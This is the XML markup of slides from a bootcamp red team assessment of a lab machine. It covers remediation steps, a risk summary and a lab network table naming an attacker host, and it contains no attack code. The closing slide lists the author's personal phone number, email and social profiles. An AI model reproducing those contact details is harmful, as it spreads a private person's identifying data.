                          <a:spcPts val="0"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="0"/>
                        </a:spcAft>
                        <a:buNone/>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="en" sz="1800"/>
                        <a:t>Add MFA requirement for sensitive data</a:t>
                      </a:r>
                      <a:endParaRPr sz="18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700"/>
                        <a:t>Low</a:t>
                      </a:r>
                      <a:endParaRPr sz="17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t>May be included with existing assets</a:t>
                      </a:r>
                      <a:endParaRPr sz="18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800"/>
                        <a:t>Ongoing, with initial setup 1 day</a:t>
                      </a:r>
                      <a:endParaRPr sz="1800"/>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marT="91425" marB="91425" marR="91425" marL="91425" anchor="ctr">
                    <a:lnT cap="flat" cmpd="sng" w="9525">
                      <a:solidFill>
                        <a:srgbClr val="9E9E9E"/>
                      </a:solidFill>
                      <a:prstDash val="solid"/>
                      <a:round/>
                      <a:headEnd len="sm" w="sm" type="none"/>
                      <a:tailEnd len="sm" w="sm" type="none"/>
                    </a:lnT>
                  </a:tcPr>
                </a:tc>
              </a:tr>
              <a:tr h="535650">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
                        <a:spcBef>
                          <a:spcPts val="0"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="0"/>
                        </a:spcAft>
                        <a:buClr>
                          <a:schemeClr val="dk1"/>
                        </a:buClr>
                        <a:buSzPts val="1100"/>
                        <a:buFont typeface="Arial"/>
                        <a:buNone/>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="en" sz="3400">
                          <a:solidFill>
                            <a:schemeClr val="dk2"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t>6</a:t>
                      </a:r>
                      <a:endParaRPr sz="1200"/>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marT="91425" marB="91425" marR="91425" marL="91425" anchor="ctr">
                    <a:solidFill>
                      <a:srgbClr val="D9EAD3"/>
                    </a:solidFill>
                  </a:tcPr>
                </a:tc>
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
                        <a:spcBef>
                          <a:spcPts val="0"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="0"/>
                        </a:spcAft>
                        <a:buNone/>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="en" sz="1800"/>
                        <a:t>Add system alerts</a:t>
                      </a:r>
                      <a:endParaRPr sz="1800"/>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marT="91425" marB="91425" marR="91425" marL="91425" anchor="ctr">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n" sz="1700"/>
                        <a:t>Medium</a:t>
                      </a:r>
                      <a:endParaRPr sz="17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800"/>
                        <a:t>Varies</a:t>
                      </a:r>
                      <a:endParaRPr sz="1800"/>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marT="91425" marB="91425" marR="91425" marL="91425" anchor="ctr">
                    <a:lnL cap="flat" cmpd="sng" w="9525">
                      <a:solidFill>
                        <a:srgbClr val="9E9E9E"/>
                      </a:solidFill>
                      <a:prstDash val="solid"/>
                      <a:round/>
                      <a:headEnd len="sm" w="sm" type="none"/>
                      <a:tailEnd len="sm" w="sm" type="none"/>
                    </a:lnL>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800">
                          <a:solidFill>
                            <a:schemeClr val="dk1"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t>2 days - 2 weeks</a:t>
                      </a:r>
                      <a:endParaRPr sz="1800"/>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marT="91425" marB="91425" marR="91425" marL="91425" anchor="ctr">
                    <a:solidFill>
                      <a:srgbClr val="D9EAD3"/>
                    </a:solidFill>
                  </a:tcPr>
                </a:tc>
              </a:tr>
              <a:tr h="535650">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
                        <a:spcBef>
                          <a:spcPts val="0"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="0"/>
                        </a:spcAft>
                        <a:buClr>
                          <a:schemeClr val="dk1"/>
                        </a:buClr>
                        <a:buSzPts val="1100"/>
                        <a:buFont typeface="Arial"/>
                        <a:buNone/>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="en" sz="3400">
                          <a:solidFill>
                            <a:schemeClr val="dk2"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t>7</a:t>
                      </a:r>
                      <a:endParaRPr sz="12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t>Harden system against reverse-shell upload</a:t>
                      </a:r>
                      <a:endParaRPr sz="1800"/>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700"/>
                        <a:t>Medium</a:t>
                      </a:r>
                      <a:endParaRPr sz="17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t>None if done by existing staff</a:t>
                      </a:r>
                      <a:endParaRPr sz="18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800"/>
                        <a:t>1 - 2 days</a:t>
                      </a:r>
                      <a:endParaRPr sz="1800"/>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marT="91425" marB="91425" marR="91425" marL="91425" anchor="ctr">
                    <a:lnB cap="flat" cmpd="sng" w="9525">
                      <a:solidFill>
                        <a:srgbClr val="9E9E9E"/>
                      </a:solidFill>
                      <a:prstDash val="solid"/>
                      <a:round/>
                      <a:headEnd len="sm" w="sm" type="none"/>
                      <a:tailEnd len="sm" w="sm" type="none"/>
                    </a:lnB>
                  </a:tcPr>
                </a:tc>
              </a:tr>
            </a:tbl>
          </a:graphicData>
        </a:graphic>
      </p:graphicFrame>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1489" name="Google Shape;1489;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71" name="Shape 1071"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1072" name="Google Shape;1072;p57"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="2" type="subTitle"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4841850" y="4796725"/>
            <a:ext cx="21744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Risk matrix template from Smartsheet.com</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1073" name="Google Shape;1073;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134F5C"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Overall Risk Analysis</a:t>
            </a:r>
            <a:endParaRPr>
              <a:solidFill>
                <a:srgbClr val="134F5C"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1074" name="Google Shape;1074;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CC0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Immediate Remediation Needed</a:t>
            </a:r>
            <a:endParaRPr b="1">
              <a:solidFill>
                <a:srgbClr val="CC0000"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1075" name="Google Shape;1075;p57"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="3" type="body"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="1690863"/>
            <a:ext cx="3990900" cy="2163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2000"/>
              <a:t>The Capstone machine was found to have several vulnerabilities that could severely impact the functionality of the company going forward.</a:t>
            </a:r>
            <a:endParaRPr sz="2000"/>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rPr lang="en"/>
              <a:t> </a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="1076" name="Google Shape;1076;p57"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId3">
            <a:alphaModFix/>
          </a:blip>
          <a:srcRect b="5669" l="3703" r="3247" t="5053"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="4130550" y="748888"/>
            <a:ext cx="3829050" cy="4047825"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1077" name="Google Shape;107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134F5C"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Contact Info</a:t>
            </a:r>
            <a:endParaRPr>
              <a:solidFill>
                <a:srgbClr val="134F5C"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1495" name="Google Shape;1495;p93"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="1" type="subTitle"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="354725" y="675975"/>
            <a:ext cx="8789100" cy="942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500"/>
              <a:t>This slide show was adapted from a template provided to the </a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en" sz="1500"/>
            </a:br>
            <a:r>
              <a:rPr lang="en" sz="1500"/>
              <a:t>Spring 2021 cohort of Columbia University’s cybersecurity bootcamp (via Trilogy, Inc.). </a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en" sz="1500"/>
            </a:br>
            <a:r>
              <a:rPr lang="en" sz="1500"/>
              <a:t>The author of this adaptation can be reached as follows:</a:t>
            </a:r>
            <a:endParaRPr sz="1500"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1496" name="Google Shape;1496;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sp>
        <p:nvSpPr>
          <p:cNvPr id="1497" name="Google Shape;1497;p93"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="3" type="body"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="919050" y="1618875"/>
            <a:ext cx="7305900" cy="3105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2600">
                <a:solidFill>
                  <a:srgbClr val="6AA84F"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Janice Wright</a:t>
            </a:r>
            <a:endParaRPr b="1" sz="2600">
              <a:solidFill>
                <a:srgbClr val="6AA84F"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="800"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1700">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>⧫ </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="2400">
                <a:solidFill>
                  <a:srgbClr val="434343"/>
                </a:solidFill>
              </a:rPr>
              <a:t>347-809-0859</a:t>
            </a:r>
            <a:endParaRPr sz="2400">
              <a:solidFill>
                <a:srgbClr val="434343"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="800"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1700">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>⧫ </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="2400">
                <a:solidFill>
                  <a:srgbClr val="434343"/>
                </a:solidFill>
              </a:rPr>
              <a:t>wrightjanice77@gmail.com</a:t>
            </a:r>
            <a:endParaRPr sz="2400">
              <a:solidFill>
                <a:srgbClr val="434343"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="800"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1700">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>⧫ </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="2400">
                <a:solidFill>
                  <a:srgbClr val="434343"/>
                </a:solidFill>
              </a:rPr>
              <a:t>https://www.linkedin.com/in/janicewright/</a:t>
            </a:r>
            <a:endParaRPr sz="2400">
              <a:solidFill>
                <a:srgbClr val="434343"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="800"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1700">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>⧫ </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="2400">
                <a:solidFill>
                  <a:srgbClr val="434343"/>
                </a:solidFill>
              </a:rPr>
              <a:t>https://github.com/JaniceW777</a:t>
            </a:r>
            <a:endParaRPr sz="2400">
              <a:solidFill>
                <a:srgbClr val="434343"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="800"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:t/>
            </a:r>
            <a:endParaRPr sz="1200">
              <a:solidFill>
                <a:srgbClr val="434343"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="800"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="2000">
                <a:solidFill>
                  <a:srgbClr val="134F5C"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Time Zone: </a:t>
            </a:r>
            <a:r>
              <a:rPr i="1" lang="en" sz="2000">
                <a:solidFill>
                  <a:srgbClr val="434343"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Eastern Time (UTC -5:00/-4:00)</a:t>
            </a:r>
            <a:endParaRPr i="1" sz="2000">
              <a:solidFill>
                <a:srgbClr val="434343"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="800"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="800"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:t/>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1498" name="Google Shape;1498;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9" name="Google Shape;1499;p93"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="274100" y="533700"/>
            <a:ext cx="8595600" cy="4383000"/>
          </a:xfrm>
          <a:prstGeom prst="frame">
            <a:avLst>
              <a:gd fmla="val 3013" name="adj1"/>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1503" name="Shape 1503"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="1504" name="Google Shape;1504;p94"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3">
            <a:alphaModFix/>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="152400" y="152400"/>
            <a:ext cx="8839200" cy="47715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81" name="Shape 1081"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1082" name="Google Shape;1082;p58"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="289200" y="2012400"/>
            <a:ext cx="8565600" cy="69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8"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="274350" y="2012400"/>
            <a:ext cx="8595300" cy="6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34F5C"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Network Topology </a:t>
            </a:r>
            <a:endParaRPr>
              <a:solidFill>
                <a:srgbClr val="134F5C"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1084" name="Google Shape;1084;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8" name="Shape 1088"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1089" name="Google Shape;1089;p59"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="2" type="body"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="115375" y="249775"/>
            <a:ext cx="8736900" cy="45582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90" name="Google Shape;1090;p59"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="3" type="subTitle"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="115375" y="941200"/>
            <a:ext cx="2368500" cy="35439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255.0.0.0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rPr lang="en"/>
              <a:t>Server: ML-REF-VM-684427</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="1100"/>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <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 </a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en"/>
            </a:br>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>also Server-1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91" name="Google Shape;1091;p59"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="-12300" y="6375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Network </a:t>
            </a:r>
            <a:endParaRPr>
              <a:solidFill>
                <a:srgbClr val="38761D"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en">
                <a:solidFill>
                  <a:srgbClr val="38761D"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Topology</a:t>
            </a:r>
            <a:endParaRPr>
              <a:solidFill>
                <a:srgbClr val="38761D"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1092" name="Google Shape;1092;p5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pic>
        <p:nvPicPr>
          <p:cNvPr id="1093" name="Google Shape;1093;p59"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3">
            <a:alphaModFix/>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="2048575" y="551900"/>
            <a:ext cx="6803702" cy="4039701"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1094" name="Google Shape;1094;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98" name="Shape 1098"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="1099" name="Google Shape;1099;p60"/>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100" name="Google Shape;1100;p6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101" name="Google Shape;1101;p60"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="228125" y="1987350"/>
            <a:ext cx="8641500" cy="115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txBox="1"/>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="274350" y="1900463"/>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134F5C"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Red Team</a:t>
            </a:r>
            <a:endParaRPr b="1">
              <a:solidFill>
                <a:srgbClr val="134F5C"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="ctr">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="1100"/>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en">
                <a:solidFill>
                  <a:srgbClr val="134F5C"/>
                </a:solidFill>
                <a:latin typeface="Roboto Light"/>
                <a:ea typeface="Roboto Light"/>
                <a:cs typeface="Roboto Light"/>
                <a:sym typeface="Roboto Light"/>
              </a:rPr>
              <a:t>Security Assessment</a:t>
            </a:r>
            <a:endParaRPr>
              <a:solidFill>
                <a:srgbClr val="134F5C"/>
              </a:solidFill>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103" name="Google Shape;1103;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Recon: Describing the Target</a:t>
            </a:r>
            <a:endParaRPr>
              <a:solidFill>
                <a:srgbClr val="38761D"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1109" name="Google Shape;1109;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110" name="Google Shape;111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graphicFrame>
        <p:nvGraphicFramePr>
          <p:cNvPr id="1111" name="Google Shape;1111;p61"/>
          <p:cNvGraphicFramePr/>
          <p:nvPr/>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="419800" y="1198750"/>
          <a:ext cx="3000000" cy="3000000"/>
        </p:xfrm>
        <a:graphic>
          <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/table">
            <a:tbl>
              <a:tblPr>
                <a:noFill/>
                <a:tableStyleId>{43937092-1D85-4520-81C4-1C38C2314272}</a:tableStyleId>
              </a:tblPr>
              <a:tblGrid>
                <a:gridCol w="2934250"/>
                <a:gridCol w="1880825"/>
                <a:gridCol w="3531525"/>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Clr>
                          <a:schemeClr val="dk1"/>
                        </a:buClr>
                        <a:buSzPts val="1100"/>
                        <a:buFont typeface="Arial"/>
                        <a:buNone/>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="en" sz="1700">
                          <a:solidFill>
                            <a:schemeClr val="dk1"/>
                          </a:solidFill>
                          <a:latin typeface="Roboto"/>
                          <a:ea typeface="Roboto"/>
                          <a:cs typeface="Roboto"/>
                          <a:sym typeface="Roboto"/>
                        </a:rPr>
                        <a:t>Capstone/Server-1</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Roboto"/>
                          <a:ea typeface="Roboto"/>
                          <a:cs typeface="Roboto"/>
                          <a:sym typeface="Roboto"/>
                        </a:rPr>
                        <a:t>192.168.1.105</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700">
                          <a:latin typeface="Roboto"/>
                          <a:ea typeface="Roboto"/>
                          <a:cs typeface="Roboto"/>
                          <a:sym typeface="Roboto"/>
                        </a:rPr>
                        <a:t>Vulnerable System</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700">
                          <a:latin typeface="Roboto"/>
                          <a:ea typeface="Roboto"/>
                          <a:cs typeface="Roboto"/>
                          <a:sym typeface="Roboto"/>
                        </a:rPr>
                        <a:t>Kali</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Roboto"/>
                          <a:ea typeface="Roboto"/>
                          <a:cs typeface="Roboto"/>
                          <a:sym typeface="Roboto"/>
                        </a:rPr>
                        <a:t>192.168.1.90</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700">
                          <a:latin typeface="Roboto"/>
                          <a:ea typeface="Roboto"/>
                          <a:cs typeface="Roboto"/>
                          <a:sym typeface="Roboto"/>
                        </a:rPr>
                        <a:t>Attacker</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700">
                          <a:latin typeface="Roboto"/>
                          <a:ea typeface="Roboto"/>
                          <a:cs typeface="Roboto"/>
                          <a:sym typeface="Roboto"/>
                        </a:rPr>
                        <a:t>ELK </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Roboto"/>
                          <a:ea typeface="Roboto"/>
                          <a:cs typeface="Roboto"/>
                          <a:sym typeface="Roboto"/>
                        </a:rPr>
                        <a:t>192.168.1.100</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700">
                          <a:latin typeface="Roboto"/>
                          <a:ea typeface="Roboto"/>
                          <a:cs typeface="Roboto"/>
                          <a:sym typeface="Roboto"/>
                        </a:rPr>
                        <a:t>Data collection to identify and track the attack</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Clr>
                          <a:schemeClr val="dk1"/>
                        </a:buClr>
                        <a:buSzPts val="1100"/>
                        <a:buFont typeface="Arial"/>
                        <a:buNone/>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="en" sz="1700">
                          <a:solidFill>
                            <a:schemeClr val="dk1"/>
                          </a:solidFill>
                          <a:latin typeface="Roboto"/>
                          <a:ea typeface="Roboto"/>
                          <a:cs typeface="Roboto"/>
                          <a:sym typeface="Roboto"/>
                        </a:rPr>
                        <a:t>Hyper-V   </a:t>
                      </a:r>
                      <a:br>
                        <a:rPr lang="en" sz="1700">
                          <a:solidFill>
                            <a:schemeClr val="dk1"/>
                          </a:solidFill>
                          <a:latin typeface="Roboto"/>
                          <a:ea typeface="Roboto"/>
                          <a:cs typeface="Roboto"/>
                          <a:sym typeface="Roboto"/>
                        </a:rPr>
                      </a:br>
                      <a:r>
                        <a:rPr lang="en" sz="1700">
                          <a:solidFill>
                            <a:schemeClr val="dk1"/>
                          </a:solidFill>
                          <a:latin typeface="Roboto"/>
                          <a:ea typeface="Roboto"/>
                          <a:cs typeface="Roboto"/>
                          <a:sym typeface="Roboto"/>
                        </a:rPr>
                        <a:t>     &gt;  </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en" sz="1700">
                          <a:solidFill>
                            <a:schemeClr val="dk1"/>
                          </a:solidFill>
                          <a:latin typeface="Roboto"/>
                          <a:ea typeface="Roboto"/>
                          <a:cs typeface="Roboto"/>
                          <a:sym typeface="Roboto"/>
                        </a:rPr>
                        <a:t>ML-REF-VM-684427</a:t>
                      </a:r>
                      <a:endParaRPr sz="19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Roboto"/>
                          <a:ea typeface="Roboto"/>
                          <a:cs typeface="Roboto"/>
                          <a:sym typeface="Roboto"/>
                        </a:rPr>
                        <a:t>192.168.1.1</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700">
                          <a:latin typeface="Roboto"/>
                          <a:ea typeface="Roboto"/>
                          <a:cs typeface="Roboto"/>
                          <a:sym typeface="Roboto"/>
                        </a:rPr>
                        <a:t>Network server</a:t>
                      </a:r>
                      <a:endParaRPr sz="17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1112" name="Google Shape;1112;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8761D"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Vulnerability </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en">
                <a:solidFill>
                  <a:srgbClr val="38761D"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Assessment</a:t>
            </a:r>
            <a:endParaRPr>
              <a:solidFill>
                <a:srgbClr val="38761D"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1118" name="Google Shape;1118;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latin typeface="Roboto Medium"/>
                <a:ea typeface="Roboto Medium"/>
                <a:cs typeface="Roboto Medium"/>
                <a:sym typeface="Roboto Medium"/>
              </a:rPr>
              <a:t>The following vulnerabilities had the highest likelihood of negative impact:</a:t>
            </a:r>
